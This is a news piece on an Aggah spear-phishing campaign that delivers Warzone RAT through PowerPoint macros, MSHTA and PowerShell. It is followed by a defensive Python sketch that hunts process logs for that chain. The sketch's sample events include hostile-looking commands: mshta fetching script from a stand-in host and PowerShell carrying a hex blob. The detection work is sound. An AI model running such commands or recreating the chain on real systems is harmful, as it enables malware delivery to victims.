Marketers should be on the lookout for a new attempt by spear phishing artists to hijack their sites.
The Pakistan-based threat actor Aggah is allegedly using hijacked sites to deliver Warzone RAT, a very dangerous form of malware, to manufacturing sites in Taiwan and South Korea, cyber security firm Anomali reports.
This summer’s campaign started with a custom email pretending to be from “foodHub.co.uk,” an online delivery service.
It's not clear how a hijacked foodHub.co.uk URL would have bamboozled manufacturing employees in Asia.
Hoteloscar.in, a website for a hotel in India, has also been compromised, leading Anomali to believe that the threat actors may have exploited a WordPress vulnerability.
Anomali writes that it “discovered a spearphishing campaign that appears to have begun in early July 2021, targeting the manufacturing industry throughout Asia. The tactics, techniques, and procedures (TTPs) identified in this campaign align with the Aggah threat group.”
It continues, “Our analysis found multiple PowerPoint files that contained malicious macros that used MSHTA to execute a script utilizing PowerShell to load hex-encoded payloads. Based on the TTPs of this campaign, we assess with moderate confidence this is Aggah.”
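For defenders, the chain Anomali describes (a PowerPoint macro launching MSHTA, which then runs PowerShell) can be hunted for in process-creation logs. The sketch below is an added example, not code from Anomali or from the campaign; the event records, field names, paths and the example.invalid host are constructed, and looking for a hex string on the PowerShell command line is an assumption about where the encoded payload might be visible.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

OFFICE = {"powerpnt.exe", "winword.exe", "excel.exe"}
HEX_RUN = re.compile(r"(?:[0-9A-Fa-f]{2}){32,}")  # 64+ contiguous hex characters

# Constructed process-creation records (fields modelled on Sysmon Event ID 1).
# Paths, PIDs and example.invalid are made up; none are indicators from the report.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "cmd": r'POWERPNT.EXE "C:\Users\a\Downloads\order.ppt"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe http://example.invalid/page"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -c $h='" + "4D5A9000" * 10 + "'"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe Get-ChildItem"},
]

def proc_name(event):
    return basename(event["image"]).lower()

def ancestors(event, by_pid):
    """Yield parent, grandparent, ... stopping on unknown PIDs or loops."""
    seen = {event["pid"]}
    cur = by_pid.get(event["ppid"])
    while cur and cur["pid"] not in seen:
        seen.add(cur["pid"])
        yield cur
        cur = by_pid.get(cur["ppid"])

def find_office_mshta_chains(events):
    """Flag PowerShell whose ancestry is Office -> mshta.exe, the order quoted above."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if proc_name(e) != "powershell.exe":
            continue
        names = [proc_name(a) for a in ancestors(e, by_pid)]
        above_mshta = names[names.index("mshta.exe") + 1:] if "mshta.exe" in names else []
        office = next((n for n in above_mshta if n in OFFICE), None)
        if office:  # hex_blob is a heuristic (assumption), not a confirmed campaign trait
            findings.append({"pid": e["pid"], "office_parent": office,
                             "hex_blob": bool(HEX_RUN.search(e["cmd"]))})
    return findings

print(find_office_mshta_chains(EVENTS))
```

On real telemetry, key the parent lookup on a unique process identifier (such as Sysmon's ProcessGuid) rather than the PID, because PIDs are reused.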